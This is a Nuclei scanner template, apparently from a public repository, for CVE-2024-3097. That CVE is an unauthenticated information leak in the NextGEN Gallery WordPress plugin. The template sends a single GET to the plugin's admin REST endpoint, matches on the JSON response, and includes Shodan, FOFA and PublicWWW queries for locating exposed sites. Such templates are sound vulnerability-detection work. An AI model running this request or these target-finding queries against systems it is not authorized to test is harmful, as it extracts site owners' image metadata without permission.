nuclei-templates/http/cves/2024/CVE-2024-3097.yaml

56 lines
2.1 KiB
YAML
Raw Normal View History

2024-05-14 20:00:29 +00:00
id: CVE-2024-3097
info:
name: NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure
author: DhiyanesDK
severity: medium
description: |
The WordPress Gallery Plugin NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.
reference:
- https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/REST/Admin/Block.php#L40
- https://www.wordfence.com/threat-intel/vulnerabilities/id/75f87f99-9f0d-46c2-a6f1-3c1ea0176303?source=cve
- https://zpbrent.github.io/pocs/8-plugin-nextgen-gallery-InfoDis-20240327.mp4
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-3097
cwe-id: CWE-862
2024-05-31 19:23:20 +00:00
epss-score: 0.04672
epss-percentile: 0.92605
2024-05-14 20:00:29 +00:00
cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2024-05-14 20:00:29 +00:00
vendor: imagely
product: "nextgen_gallery"
2024-05-14 20:00:29 +00:00
framework: wordpress
shodan-query:
- "cpe:\"cpe:2.3:a:imagely:nextgen_gallery\""
- http.html:/wp-content/plugins/nextgen-gallery/
fofa-query: "body=/wp-content/plugins/nextgen-gallery/"
2024-05-14 20:00:29 +00:00
publicwww-query: "/wp-content/plugins/nextgen-gallery/"
tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak,imagely
2024-05-14 20:00:29 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":'
- '"image":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402204cf9cdd69982a8e227f0c764131f0bd599577b93aa5bd10b754c70d912602c36022043662719fb8ead44e0995b7428e6c96ea3079f74f0382eb42bc39d181c0b284a:922c64590222798bb761d5b6d8e72950